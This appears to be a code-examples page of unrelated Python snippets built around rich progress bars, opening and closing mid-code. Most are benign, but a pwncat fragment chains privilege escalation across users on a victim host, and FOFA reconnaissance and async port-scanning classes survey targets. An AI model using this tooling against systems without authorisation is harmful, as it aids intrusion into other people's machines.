        for user, persist in installed:
            if self.in_chain(user, chain):
                continue
            progress.update(task, step=persist.format(user))
            if persist.escalate(user):

                # Ensure history and prompt are correct
                pwncat.victim.reset()

                # Update the current user
                if pwncat.victim.update_user() != user:
                    if pwncat.victim.getenv("SHLVL") != shlvl:
                        pwncat.victim.run("exit", wait=False)
                    continue

                chain.append((PersistenceTechnique(persist, user), "exit"))

                try:
                    return self._escalate(progress, target_user, exclude,
                                          depth, chain, starting_user)
                except PrivescError:
                    chain.pop()
                    pwncat.victim.run("exit", wait=False)

                # Don't retry later
                if user in techniques:
                    del techniques[user]

        progress.update(task, status="recursing")

        # We can't escalate directly to the target. Instead, try recursively
        # against other users.
        for user, techs in techniques.items():
            if user == target_user:
                continue
            if self.in_chain(user, chain):
                continue
            try:
                progress.update(task,
                                step=f"escalating to [green]{user}[/green]")
                tech, exit_command = self.escalate_single(
                    techs, shlvl, progress, task)

                chain.append((tech, exit_command))
                pwncat.victim.reset(hard=False)
                pwncat.victim.update_user()
            except PrivescError:
                continue
            try:
                progress.update(
                    task, step=f"success, recursing as [green]{user}[/green]")
                return self._escalate(progress, target_user, exclude, depth,
                                      chain, starting_user)
            except PrivescError:
                tech, exit_command = chain[-1]
                pwncat.victim.run(exit_command, wait=False)
                chain.pop()

        raise PrivescError(f"no route to {target_user} found")
class DisplayManager:
    def __init__(self):

        # ! Change color system if "legacy" windows terminal to prevent wrong colors displaying
        self.is_legacy = detect_legacy_windows()

        # ! dumb_terminals automatically handled by rich. Color system is too but it is incorrect
        # ! for legacy windows ... so no color for y'all.
        self.console = Console(
            theme=custom_theme, color_system="truecolor" if not self.is_legacy else None
        )

        self._rich_progress_bar = Progress(
            SizedTextColumn(
                "[white]{task.description}",
                overflow="ellipsis",
                width=int(self.console.width / 3),
            ),
            SizedTextColumn("{task.fields[message]}", width=18, style="nonimportant"),
            BarColumn(bar_width=None, finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            TimeRemainingColumn(),
            console=self.console,
            # ! Normally when you exit the progress context manager (or call stop())
            # ! the last refreshed display remains in the terminal with the cursor on
            # ! the following line. You can also make the progress display disappear on
            # ! exit by setting transient=True on the Progress constructor
            transient=self.is_legacy,
        )

        self.song_count = 0
        self.overall_task_id = None
        self.overall_progress = 0
        self.overall_total = 100
        self.overall_completed_tasks = 0
        self.quiet = False

        # ! Basically a wrapper for rich's: with ... as ...
        self._rich_progress_bar.__enter__()

    def print(self, *text, color="green"):
        """
        `text` : `any`  Text to be printed to screen
        Use this self.print to replace default print().
        """

        if self.quiet:
            return

        line = "".join(str(item) + " " for item in text)
        if color:
            self._rich_progress_bar.console.print(f"[{color}]{line}")
        else:
            self._rich_progress_bar.console.print(line)

    def set_song_count_to(self, song_count: int) -> None:
        """
        `int` `song_count` : number of songs being downloaded
        RETURNS `~`
        sets the size of the progressbar based on the number of songs in the current
        download set
        """

        # ! all calculations are based of the arbitrary choice that 1 song consists of
        # ! 100 steps/points/iterations
        self.song_count = song_count

        self.overall_total = 100 * song_count

        if self.song_count > 4:
            self.overall_task_id = self._rich_progress_bar.add_task(
                description="Total",
                process_id="0",
                message=f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                total=self.overall_total,
                visible=(not self.quiet),
            )

    def update_overall(self):
        """
        Updates the overall progress bar.
        """

        # If the overall progress bar exists
        if self.overall_task_id is not None:
            self._rich_progress_bar.update(
                self.overall_task_id,
                message=f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                completed=self.overall_progress,
            )

    def new_progress_tracker(self, songObj):
        """
        returns new instance of `_ProgressTracker` that follows the `songObj` download subprocess
        """
        return _ProgressTracker(self, songObj)

    def close(self) -> None:
        """
        clean up rich
        """

        self._rich_progress_bar.stop()
Exemplo n.º 19
0
class RichOutput(AbstractChecksecOutput):
    def __init__(self):
        """Init Rich Console and Table"""
        super().__init__()
        # init ELF table
        self.table_elf = Table(title="Checksec Results: ELF", expand=True)
        self.table_elf.add_column("File", justify="left", header_style="")
        self.table_elf.add_column("NX", justify="center")
        self.table_elf.add_column("PIE", justify="center")
        self.table_elf.add_column("Canary", justify="center")
        self.table_elf.add_column("Relro", justify="center")
        self.table_elf.add_column("RPATH", justify="center")
        self.table_elf.add_column("RUNPATH", justify="center")
        self.table_elf.add_column("Symbols", justify="center")
        self.table_elf.add_column("FORTIFY", justify="center")
        self.table_elf.add_column("Fortified", justify="center")
        self.table_elf.add_column("Fortifiable", justify="center")
        self.table_elf.add_column("Fortify Score", justify="center")

        # init PE table
        self.table_pe = Table(title="Checksec Results: PE", expand=True)
        self.table_pe.add_column("File", justify="left", header_style="")
        self.table_pe.add_column("NX", justify="center")
        self.table_pe.add_column("Canary", justify="center")
        self.table_pe.add_column("ASLR", justify="center")
        self.table_pe.add_column("Dynamic Base", justify="center")
        self.table_pe.add_column("High Entropy VA", justify="center")
        self.table_pe.add_column("SEH", justify="center")
        self.table_pe.add_column("SafeSEH", justify="center")
        self.table_pe.add_column("Force Integrity", justify="center")
        self.table_pe.add_column("Control Flow Guard", justify="center")
        self.table_pe.add_column("Isolation", justify="center")

        # init console
        self.console = Console()

        # build progress bar
        self.process_bar = Progress(
            TextColumn("[bold blue]Processing...", justify="left"),
            BarColumn(bar_width=None),
            "{task.completed}/{task.total}",
            "•",
            "[progress.percentage]{task.percentage:>3.1f}%",
            console=self.console,
        )
        self.display_res_bar = Progress(
            BarColumn(bar_width=None),
            TextColumn("[bold blue]{task.description}", justify="center"),
            BarColumn(bar_width=None),
            console=self.console,
            transient=True,
        )
        self.enumerate_bar = Progress(
            TextColumn("[bold blue]Enumerating...", justify="center"),
            BarColumn(bar_width=None),
            console=self.console,
            transient=True,
        )

        self.process_task_id = None

    def __exit__(self, exc_type, exc_val, exc_tb):
        # cleanup the Rich progress bars
        if self.enumerate_bar is not None:
            self.enumerate_bar.stop()
        if self.process_bar is not None:
            self.process_bar.stop()
        if self.display_res_bar is not None:
            self.display_res_bar.stop()

    def enumerating_tasks_start(self):
        # start progress bar
        self.enumerate_bar.start()
        self.enumerate_bar.add_task("Enumerating", start=False)

    def enumerating_tasks_stop(self, total: int):
        super().enumerating_tasks_stop(total)
        self.enumerate_bar.stop()
        self.enumerate_bar = None

    def processing_tasks_start(self):
        # init progress bar
        self.process_bar.start()
        self.process_task_id = self.process_bar.add_task("Checking",
                                                         total=self.total)

    def add_checksec_result(self, filepath: Path,
                            checksec: Union[ELFChecksecData, PEChecksecData]):
        if isinstance(checksec, ELFChecksecData):
            # display results
            if not checksec.nx:
                nx_res = "[red]No"
            else:
                nx_res = "[green]Yes"

            pie = checksec.pie
            if pie == PIEType.No:
                pie_res = f"[red]{pie.name}"
            elif pie == PIEType.DSO:
                pie_res = f"[yellow]{pie.name}"
            else:
                pie_res = "[green]Yes"

            if not checksec.canary:
                canary_res = "[red]No"
            else:
                canary_res = "[green]Yes"

            relro = checksec.relro
            if relro == RelroType.No:
                relro_res = f"[red]{relro.name}"
            elif relro == RelroType.Partial:
                relro_res = f"[yellow]{relro.name}"
            else:
                relro_res = f"[green]{relro.name}"

            if checksec.rpath:
                rpath_res = "[red]Yes"
            else:
                rpath_res = "[green]No"

            if checksec.runpath:
                runpath_res = "[red]Yes"
            else:
                runpath_res = "[green]No"

            if checksec.symbols:
                symbols_res = "[red]Yes"
            else:
                symbols_res = "[green]No"

            fortified_count = checksec.fortified
            if checksec.fortify_source:
                fortify_source_res = "[green]Yes"
            else:
                fortify_source_res = "[red]No"

            if fortified_count == 0:
                fortified_res = "[red]No"
            else:
                fortified_res = f"[green]{fortified_count}"

            fortifiable_count = checksec.fortifiable
            if fortified_count == 0:
                fortifiable_res = "[red]No"
            else:
                fortifiable_res = f"[green]{fortifiable_count}"

            if checksec.fortify_score == 0:
                fortified_score_res = f"[red]{checksec.fortify_score}"
            elif checksec.fortify_score == 100:
                fortified_score_res = f"[green]{checksec.fortify_score}"
            else:
                fortified_score_res = f"[yellow]{checksec.fortify_score}"

            self.table_elf.add_row(
                str(filepath),
                nx_res,
                pie_res,
                canary_res,
                relro_res,
                rpath_res,
                runpath_res,
                symbols_res,
                fortify_source_res,
                fortified_res,
                fortifiable_res,
                fortified_score_res,
            )
        elif isinstance(checksec, PEChecksecData):
            if not checksec.nx:
                nx_res = "[red]No"
            else:
                nx_res = "[green]Yes"

            if not checksec.canary:
                canary_res = "[red]No"
            else:
                canary_res = "[green]Yes"

            if not checksec.aslr:
                aslr_res = "[red]No"
            else:
                aslr_res = "[green]Yes"

            if not checksec.dynamic_base:
                dynamic_base_res = "[red]No"
            else:
                dynamic_base_res = "[green]Yes"

            # this is only relevant is binary is 64 bits
            if checksec.machine == MACHINE_TYPES.AMD64:
                if not checksec.high_entropy_va:
                    entropy_va_res = "[red]No"
                else:
                    entropy_va_res = "[green]Yes"
            else:
                entropy_va_res = "/"

            if not checksec.seh:
                seh_res = "[red]No"
            else:
                seh_res = "[green]Yes"

            # only relevant if 32 bits
            if checksec.machine == MACHINE_TYPES.I386:
                if not checksec.safe_seh:
                    safe_seh_res = "[red]No"
                else:
                    safe_seh_res = "[green]Yes"
            else:
                safe_seh_res = "/"

            if not checksec.force_integrity:
                force_integrity_res = "[red]No"
            else:
                force_integrity_res = "[green]Yes"

            if not checksec.guard_cf:
                guard_cf_res = "[red]No"
            else:
                guard_cf_res = "[green]Yes"

            if not checksec.isolation:
                isolation_res = "[red]No"
            else:
                isolation_res = "[green]Yes"

            self.table_pe.add_row(
                str(filepath),
                nx_res,
                canary_res,
                aslr_res,
                dynamic_base_res,
                entropy_va_res,
                seh_res,
                safe_seh_res,
                force_integrity_res,
                guard_cf_res,
                isolation_res,
            )
        else:
            raise NotImplementedError

    def checksec_result_end(self):
        """Update progress bar"""
        self.process_bar.update(self.process_task_id, advance=1)

    def print(self):
        self.process_bar.stop()
        self.process_bar = None

        if self.table_elf.row_count > 0:
            with self.display_res_bar:
                task_id = self.display_res_bar.add_task(
                    "Displaying Results: ELF ...", start=False)
                self.console.print(self.table_elf)
                self.display_res_bar.remove_task(task_id)
        if self.table_pe.row_count > 0:
            with self.display_res_bar:
                task_id = self.display_res_bar.add_task(
                    "Displaying Results: PE ...", start=False)
                self.console.print(self.table_pe)
                self.display_res_bar.remove_task(task_id)

        self.display_res_bar.stop()
        self.display_res_bar = None
Exemplo n.º 20
0
progress_group = Panel(Group(
    Group(current_app_progress, step_progress, app_steps_progress),
    Panel(overall_progress, box=box.HORIZONTALS),
),
                       box=box.ASCII)

# tuple specifies how long each step takes for that app
step_actions = ("downloading", "configuring", "building", "installing")
apps = [
    ("one", (2, 1, 4, 2)),
    ("two", (1, 3, 8, 4)),
    ("three", (2, 1, 3, 2)),
]

# create overall progress bar
overall_task_id = overall_progress.add_task("", total=len(apps))

# use own live instance as context manager with group of progress bars,
# which allows for running multiple different progress bars in parallel,
# and dynamically showing/hiding them
with Live(progress_group):

    for idx, (name, step_times) in enumerate(apps):
        # update message on overall progress bar
        top_descr = "[bold #AAAAAA](%d out of %d apps installed)" % (idx,
                                                                     len(apps))
        overall_progress.update(overall_task_id, description=top_descr)

        # add progress bar for steps of this app, and run the steps
        current_task_id = current_app_progress.add_task("Installing app %s" %
                                                        name)
Exemplo n.º 21
0
class Fofa:
    def __init__(self, targets, fofa_result):
        super(Fofa, self).__init__()
        self.email = fofaApi['email']
        self.key = fofaApi['key']
        self.fofa_result = fofa_result
        self.targets = targets
        self.result_urls = []  # fofa 查询到的web服务列表
        self.urls_list = []  # 去重
        self.life_urls = []  # 验证存活的web服务列表
        self.urls = []  # fofa查询的 url 列表, 供异步协程使用
        self.count = 30  # fofa 一次性查多少个
        self.session = conn_pool()  # 使用连接池
        self.headers = {
            "Cache-Control":
            "max-age=0",
            "User-Agent":
            random.choice(USER_AGENTS),
            "Upgrade-Insecure-Requests":
            "1",
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        }

        self.process = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "•",
            "[bold green]{task.completed}/{task.total}",
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
            transient=True,  # 100%后隐藏进度条
        )
        self.fofa_progress_bar = self.process.add_task("[cyan]FOFA search...",
                                                       total=len(self.targets))

        self.web_progress_bar = None

    def run(self):
        try:
            with self.process:
                self.target_formatting()  # fofa 查询url 初始化

                loop = asyncio.get_event_loop()
                loop.run_until_complete(self.fetch_all(loop))  # fofa 搜索

                self.session.close()
                self.is_life()  # 对fofa搜到的结果,取出其中的web服务,然后对web服务进行验证是否可以访问
        except Exception as e:
            logger.log("ERROR", e)
        return self.life_urls

    # 为了防止查询过快被fofa封IP, 这里将目标分割,每30个为一组,组内使用 || 语法拼接,一次性查询多个
    def target_formatting(self):
        for i in range(0, len(self.targets), self.count):
            keyword = ''
            targets = self.targets[i:i + self.count]
            for host in targets:
                host = host.replace('\n', '').replace('\r', '').strip()
                keyword += f'"{host}" || '

            keyword = keyword[:-4]  # 去除最后的 ||
            keywordsBs = base64.b64encode(keyword.encode('utf-8'))
            keywordsBs = keywordsBs.decode('utf-8')

            url = "https://fofa.so/api/v1/search/all?email={0}&key={1}&qbase64={2}&full=true&fields=ip,title,port,domain,protocol,host,country,header&size={3}".format(
                self.email, self.key, keywordsBs, fofaSize)

            self.urls.append(url)

    # 回调函数, 刷新进度条
    def callback(self, future, progress_bar, count):
        self.process.advance(progress_bar, advance=count)

    async def fetch_all(self, loop):
        # loop = asyncio.get_event_loop()
        # asyncio.set_event_loop(loop)

        tasks = []
        # 写完才发现 aiohttp 不支持https代理, 改用 loop.run_in_executor()函数 执行阻塞的requests库
        # async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(ssl=False), headers=headers) as session:
        threads = ThreadPoolExecutor(10)
        for url in self.urls:
            # task = asyncio.ensure_future(self.fetch(session, url, sem))
            task = loop.run_in_executor(threads, self.fetch, url)
            task.add_done_callback(
                partial(self.callback,
                        progress_bar=self.fofa_progress_bar,
                        count=self.count))
            tasks.append(task)
        if platform.system() != "Windows":
            import uvloop
            asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())

        await asyncio.wait(tasks)

    def fetch(self, url):
        try:
            self.session.headers = self.headers

            # self.session.proxies = {
            #     "https": "http://127.0.0.1:8080"
            # }

            response = self.session.get(url, timeout=10)
            if response.status_code == 200:
                datas = json.loads(response.text)
                # 查询结果没有出错时
                if not datas['error']:
                    self.target_info(datas['results'])
            else:
                logger.log("ERROR", f'fofa 查询失败,{response.status_code }')
        except Exception as e:
            logger.log("ERROR", e)
            pass

    def target_info(self, datas):
        for data in datas:
            # ip,title,port,domain,protocol,host,country,header
            # ['127.0.0.1', 'Welcome to CentOS', '443', '', '', '127.0.0.1:443', 'CN', 'HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4833\r\nAccept-Ranges: bytes\r\nContent-Type: text/html\r\nDate: Sun, 22 Nov 2020 10:40:22 GMT\r\nEtag: "53762af0-12e1"\r\nLast-Modified: Fri, 16 May 2014 15:12:48 GMT\r\nServer: nginx/1.16.1']
            # 只要限定国家的信息, 默认为CN
            if data[6] == fofaCountry:
                # if data[4] == "http" or data[4] == "https" or "http" in data[5]:
                if 'HTTP/1.' in data[7]:
                    if "http://" in data[5] or "https://" in data[5]:
                        url = data[5]
                    elif not data[4]:
                        url = "http://{1}".format(data[4], data[5])
                    else:
                        url = "{0}://{1}".format(data[4], data[5])
                    self.result_urls.append(url)

    async def crawler(self, url, semaphore):
        async with semaphore:
            try:
                async with aiohttp.ClientSession(
                        connector=aiohttp.TCPConnector(ssl=False),
                        headers=self.headers) as session:
                    async with session.get(url, timeout=6) as resp:
                        if url in self.urls_list or url in fofa_list:  # 已存在
                            return
                        fofa_list.append(url)
                        text = await resp.text()
                        m = re.search('<title>(.*?)</title>', text)
                        title = m.group(1) if m else ''
                        status = resp.status
                        if status == 200 or status == 404 or status == 403:
                            self.urls_list.append(url)
                            self.life_urls.append((url, title))
                            self.fofa_result.put((url, title))
            except Exception:
                pass

    # 筛选存活的web服务
    def is_life(self):
        if len(self.result_urls) == 0:
            return

        self.fofa_progress_bar = self.process.add_task(
            "[cyan]FOFA Web results verify valid...",
            total=len(self.result_urls))

        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        sem = asyncio.Semaphore(2000)  # 限制并发量
        tasks = []
        for url in self.result_urls:
            task = loop.create_task(self.crawler(url, sem))
            task.add_done_callback(
                partial(self.callback,
                        progress_bar=self.fofa_progress_bar,
                        count=1))
            tasks.append(task)

        loop.run_until_complete(asyncio.wait(tasks))
Exemplo n.º 22
0
class Video2X:
    """
    Video2X class

    provides two vital functions:
        - upscale: perform upscaling on a file
        - interpolate: perform motion interpolation on a file
    """

    def __init__(self) -> None:
        self.version = __version__

    def _get_video_info(self, path: pathlib.Path) -> tuple:
        """
        get video file information with FFmpeg

        :param path pathlib.Path: video file path
        :raises RuntimeError: raised when video stream isn't found
        """
        # probe video file info
        logger.info("Reading input video information")
        for stream in ffmpeg.probe(path)["streams"]:
            if stream["codec_type"] == "video":
                video_info = stream
                break
        else:
            raise RuntimeError("unable to find video stream")

        # get total number of frames to be processed
        capture = cv2.VideoCapture(str(path))

        # check if file is opened successfully
        if not capture.isOpened():
            raise RuntimeError("OpenCV has failed to open the input file")

        total_frames = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
        frame_rate = capture.get(cv2.CAP_PROP_FPS)

        return video_info["width"], video_info["height"], total_frames, frame_rate

    def _toggle_pause(self, _signal_number: int = -1, _frame=None):
        # print console messages and update the progress bar's status
        if self.pause.value is False:
            self.progress.update(self.task, description=self.description + " (paused)")
            self.progress.stop_task(self.task)
            logger.warning("Processing paused, press Ctrl+Alt+V again to resume")

        elif self.pause.value is True:
            self.progress.update(self.task, description=self.description)
            logger.warning("Resuming processing")
            self.progress.start_task(self.task)

        # invert the value of the pause flag
        with self.pause.get_lock():
            self.pause.value = not self.pause.value

    def _run(
        self,
        input_path: pathlib.Path,
        width: int,
        height: int,
        total_frames: int,
        frame_rate: float,
        output_path: pathlib.Path,
        output_width: int,
        output_height: int,
        Processor: object,
        mode: str,
        processes: int,
        processing_settings: tuple,
    ) -> None:

        # record original STDOUT and STDERR for restoration
        original_stdout = sys.stdout
        original_stderr = sys.stderr

        # create console for rich's Live display
        console = Console()

        # redirect STDOUT and STDERR to console
        sys.stdout = FileProxy(console, sys.stdout)
        sys.stderr = FileProxy(console, sys.stderr)

        # re-add Loguru to point to the new STDERR
        logger.remove()
        logger.add(sys.stderr, colorize=True, format=LOGURU_FORMAT)

        # initialize values
        self.processor_processes = []
        self.processing_queue = multiprocessing.Queue(maxsize=processes * 10)
        processed_frames = multiprocessing.Manager().list([None] * total_frames)
        self.processed = multiprocessing.Value("I", 0)
        self.pause = multiprocessing.Value(ctypes.c_bool, False)

        # set up and start decoder thread
        logger.info("Starting video decoder")
        self.decoder = VideoDecoder(
            input_path,
            width,
            height,
            frame_rate,
            self.processing_queue,
            processing_settings,
            self.pause,
        )
        self.decoder.start()

        # set up and start encoder thread
        logger.info("Starting video encoder")
        self.encoder = VideoEncoder(
            input_path,
            frame_rate * 2 if mode == "interpolate" else frame_rate,
            output_path,
            output_width,
            output_height,
            total_frames,
            processed_frames,
            self.processed,
            self.pause,
        )
        self.encoder.start()

        # create processor processes
        for process_name in range(processes):
            process = Processor(self.processing_queue, processed_frames, self.pause)
            process.name = str(process_name)
            process.daemon = True
            process.start()
            self.processor_processes.append(process)

        # create progress bar
        self.progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(complete_style="blue", finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            "[color(240)]({task.completed}/{task.total})",
            ProcessingSpeedColumn(),
            TimeElapsedColumn(),
            "<",
            TimeRemainingColumn(),
            console=console,
            speed_estimate_period=300.0,
            disable=True,
        )

        self.description = f"[cyan]{MODE_LABELS.get(mode, 'Unknown')}"
        self.task = self.progress.add_task(self.description, total=total_frames)

        # allow sending SIGUSR1 to pause/resume processing
        signal.signal(signal.SIGUSR1, self._toggle_pause)

        # enable global pause hotkey if it's supported
        if ENABLE_HOTKEY is True:

            # create global pause hotkey
            pause_hotkey = pynput.keyboard.HotKey(
                pynput.keyboard.HotKey.parse("<ctrl>+<alt>+v"), self._toggle_pause
            )

            # create global keyboard input listener
            keyboard_listener = pynput.keyboard.Listener(
                on_press=(
                    lambda key: pause_hotkey.press(keyboard_listener.canonical(key))
                ),
                on_release=(
                    lambda key: pause_hotkey.release(keyboard_listener.canonical(key))
                ),
            )

            # start monitoring global key presses
            keyboard_listener.start()

        # a temporary variable that stores the exception
        exception = []

        try:

            # wait for jobs in queue to deplete
            while self.processed.value < total_frames - 1:
                time.sleep(1)

                # check processor health
                for process in self.processor_processes:
                    if not process.is_alive():
                        raise Exception("process died unexpectedly")

                # check decoder health
                if not self.decoder.is_alive() and self.decoder.exception is not None:
                    raise Exception("decoder died unexpectedly")

                # check encoder health
                if not self.encoder.is_alive() and self.encoder.exception is not None:
                    raise Exception("encoder died unexpectedly")

                # show progress bar when upscale starts
                if self.progress.disable is True and self.processed.value > 0:
                    self.progress.disable = False
                    self.progress.start()

                # update progress
                if self.pause.value is False:
                    self.progress.update(self.task, completed=self.processed.value)

            self.progress.update(self.task, completed=total_frames)
            self.progress.stop()
            logger.info("Processing has completed")

        # if SIGTERM is received or ^C is pressed
        # TODO: pause and continue here
        except (SystemExit, KeyboardInterrupt) as e:
            self.progress.stop()
            logger.warning("Exit signal received, exiting gracefully")
            logger.warning("Press ^C again to force terminate")
            exception.append(e)

        except Exception as e:
            self.progress.stop()
            logger.exception(e)
            exception.append(e)

        finally:

            # stop keyboard listener
            if ENABLE_HOTKEY is True:
                keyboard_listener.stop()
                keyboard_listener.join()

            # stop progress display
            self.progress.stop()

            # stop processor processes
            logger.info("Stopping processor processes")
            for process in self.processor_processes:
                process.terminate()

            # wait for processes to finish
            for process in self.processor_processes:
                process.join()

            # stop encoder and decoder
            logger.info("Stopping decoder and encoder threads")
            self.decoder.stop()
            self.encoder.stop()
            self.decoder.join()
            self.encoder.join()

            # mark processing queue as closed
            self.processing_queue.close()

            # raise the error if there is any
            if len(exception) > 0:
                raise exception[0]

            # restore original STDOUT and STDERR
            sys.stdout = original_stdout
            sys.stderr = original_stderr

            # re-add Loguru to point to the restored STDERR
            logger.remove()
            logger.add(sys.stderr, colorize=True, format=LOGURU_FORMAT)

    def upscale(
        self,
        input_path: pathlib.Path,
        output_path: pathlib.Path,
        output_width: int,
        output_height: int,
        noise: int,
        processes: int,
        threshold: float,
        algorithm: str,
    ) -> None:

        # get basic video information
        width, height, total_frames, frame_rate = self._get_video_info(input_path)

        # automatically calculate output width and height if only one is given
        if output_width == 0 or output_width is None:
            output_width = output_height / height * width

        elif output_height == 0 or output_height is None:
            output_height = output_width / width * height

        # sanitize output width and height to be divisible by 2
        output_width = int(math.ceil(output_width / 2.0) * 2)
        output_height = int(math.ceil(output_height / 2.0) * 2)

        # start processing
        self._run(
            input_path,
            width,
            height,
            total_frames,
            frame_rate,
            output_path,
            output_width,
            output_height,
            Upscaler,
            "upscale",
            processes,
            (
                output_width,
                output_height,
                noise,
                threshold,
                algorithm,
            ),
        )

    def interpolate(
        self,
        input_path: pathlib.Path,
        output_path: pathlib.Path,
        processes: int,
        threshold: float,
        algorithm: str,
    ) -> None:

        # get video basic information
        width, height, original_frames, frame_rate = self._get_video_info(input_path)

        # calculate the number of total output frames
        total_frames = original_frames * 2 - 1

        # start processing
        self._run(
            input_path,
            width,
            height,
            total_frames,
            frame_rate,
            output_path,
            width,
            height,
            Interpolator,
            "interpolate",
            processes,
            (threshold, algorithm),
        )
Exemplo n.º 23
0
class TimeLoop:
    """
    A special iterator that will iterate for a specified duration of time.

    Uses a progress meter to show the user how much time is left.
    Each iteration of the time-loop produces a tick.
    """

    advent: Optional[pendulum.DateTime]
    moment: Optional[pendulum.DateTime]
    last_moment: Optional[pendulum.DateTime]
    counter: int
    progress: Optional[Progress]
    duration: pendulum.Duration
    message: str
    color: str

    def __init__(
        self,
        duration: Union[pendulum.Duration, int],
        message: str = "Processing",
        color: str = "green",
    ):
        """
        Initialize the time-loop.

        Duration may be either a count of seconds or a ``pendulum.duration``.
        """
        self.moment = None
        self.last_moment = None
        self.counter = 0
        self.progress = None
        if isinstance(duration, int):
            JobbergateCliError.require_condition(
                duration > 0, "The duration must be a positive integer")
            self.duration = pendulum.duration(seconds=duration)
        else:
            self.duration = duration
        self.message = message
        self.color = color

    def __del__(self):
        """
        Explicitly clear the progress meter if the time-loop is destroyed.
        """
        self.clear()

    def __iter__(self) -> "TimeLoop":
        """
        Start the iterator.

        Creates and starts the progress meter
        """
        self.advent = self.last_moment = self.moment = pendulum.now()
        self.counter = 0
        self.progress = Progress()
        self.progress.add_task(
            f"[{self.color}]{self.message}...",
            total=self.duration.total_seconds(),
        )
        self.progress.start()
        return self

    def __next__(self) -> Tick:
        """
        Iterates the time loop and returns a tick.

        If the duration is complete, clear the progress meter and stop iteration.
        """
        # Keep mypy happy
        assert self.progress is not None

        self.counter += 1
        self.last_moment = self.moment
        self.moment: pendulum.DateTime = pendulum.now()
        elapsed: pendulum.Duration = self.moment - self.last_moment
        total_elapsed: pendulum.Duration = self.moment - self.advent

        for task_id in self.progress.task_ids:
            self.progress.advance(task_id, elapsed.total_seconds())

        if self.progress.finished:
            self.clear()
            raise StopIteration

        return Tick(
            counter=self.counter,
            elapsed=elapsed,
            total_elapsed=total_elapsed,
        )

    def clear(self):
        """
        Clear the time-loop.

        Stops the progress meter (if it is set) and reset moments, counter, progress meter.
        """
        if self.progress is not None:
            self.progress.stop()
        self.counter = 0
        self.progress = None
        self.moment = None
        self.last_moment = None
Exemplo n.º 24
0
"""

from time import sleep

from rich.live import Live
from rich.panel import Panel
from rich.progress import Progress, SpinnerColumn, BarColumn, TextColumn
from rich.table import Table

job_progress = Progress(
    "{task.description}",
    SpinnerColumn(),
    BarColumn(),
    TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
)
job1 = job_progress.add_task("[green]Cooking")
job2 = job_progress.add_task("[magenta]Baking", total=200)
job3 = job_progress.add_task("[cyan]Mixing", total=400)

total = sum(task.total for task in job_progress.tasks)
overall_progress = Progress()
overall_task = overall_progress.add_task("All Jobs", total=int(total))

progress_table = Table.grid()
progress_table.add_row(
    Panel.fit(overall_progress,
              title="Overall Progress",
              border_style="green",
              padding=(2, 2)),
    Panel.fit(job_progress,
              title="[b]Jobs",
Exemplo n.º 25
0
class PortScan(object):
    def __init__(self, targets, port_list, rate=2000, timeout=3):
        super(PortScan, self).__init__()
        self.targets = targets
        self.hosts = []
        self.rate = rate  # 限制并发量
        self.timeout = timeout
        self.open_list = {}
        self.port_list = port_list  # 待扫描的端口列表
        self.process = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "•",
            "[bold green]{task.completed}/{task.total}",
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
            transient=True,  # 100%后隐藏进度条
        )
        self.progress_bar = self.process.add_task("[cyan]port scan...",
                                                  total=len(self.targets) *
                                                  len(self.port_list))

    async def async_port_check(self, semaphore, host_port):
        async with semaphore:
            host, port = host_port
            try:
                conn = asyncio.open_connection(host, port)
                reader, writer = await asyncio.wait_for(conn,
                                                        timeout=self.timeout)
                conn.close()
                return host, port, 'open'
            except Exception:
                conn.close()
                return host, port, 'close'

    # 回调函数,更新进度条,存储开放的端口
    def callback(self, future):
        host, port, status = future.result()
        self.process.advance(self.progress_bar, advance=1)
        if status == "open":
            # print(ip,port,status)
            try:
                if host in self.open_list:
                    self.open_list[host].append(port)
                else:
                    self.open_list[host] = [port]
            except Exception as e:
                print(e)
        else:
            pass

    def async_tcp_port_scan(self):
        # 不支持带协议的url,比如 https://127.0.0.1,格式化一下目标
        for url in self.targets:
            host, scheme = get_host(url)
            self.hosts.append(host)

        host_port_list = [(host, int(port)) for host in self.hosts
                          for port in self.port_list]

        print(host_port_list)
        sem = asyncio.Semaphore(self.rate)  # 限制并发量
        loop = asyncio.get_event_loop()

        # 打乱一下,随机排序
        random.shuffle(host_port_list)

        tasks = list()
        with self.process:
            for host_port in host_port_list:
                task = asyncio.ensure_future(
                    self.async_port_check(sem, host_port))
                task.add_done_callback(self.callback)
                tasks.append(task)

            if platform.system() != "Windows":
                import uvloop
                asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
            loop.run_until_complete(asyncio.wait(tasks))

        return self.open_list
Exemplo n.º 26
0
class RichProgressBar(ProgressBarBase):
    """Create a progress bar with `rich text formatting <https://github.com/willmcgugan/rich>`_.

    Install it with pip:

    .. code-block:: bash

        pip install rich

    .. code-block:: python

        from pytorch_lightning import Trainer
        from pytorch_lightning.callbacks import RichProgressBar

        trainer = Trainer(callbacks=RichProgressBar())

    Args:
        refresh_rate: the number of updates per second, must be strictly positive

    Raises:
        ImportError:
            If required `rich` package is not installed on the device.
    """
    def __init__(self, refresh_rate: float = 1.0):
        if not _RICH_AVAILABLE:
            raise ImportError(
                "`RichProgressBar` requires `rich` to be installed. Install it by running `pip install rich`."
            )
        super().__init__()
        self._refresh_rate: float = refresh_rate
        self._enabled: bool = True
        self._total_val_batches: int = 0
        self.progress: Progress = None
        self.val_sanity_progress_bar_id: Optional[int] = None
        self.main_progress_bar_id: Optional[int] = None
        self.val_progress_bar_id: Optional[int] = None
        self.test_progress_bar_id: Optional[int] = None
        self.predict_progress_bar_id: Optional[int] = None
        self.console = Console(record=True)

    @property
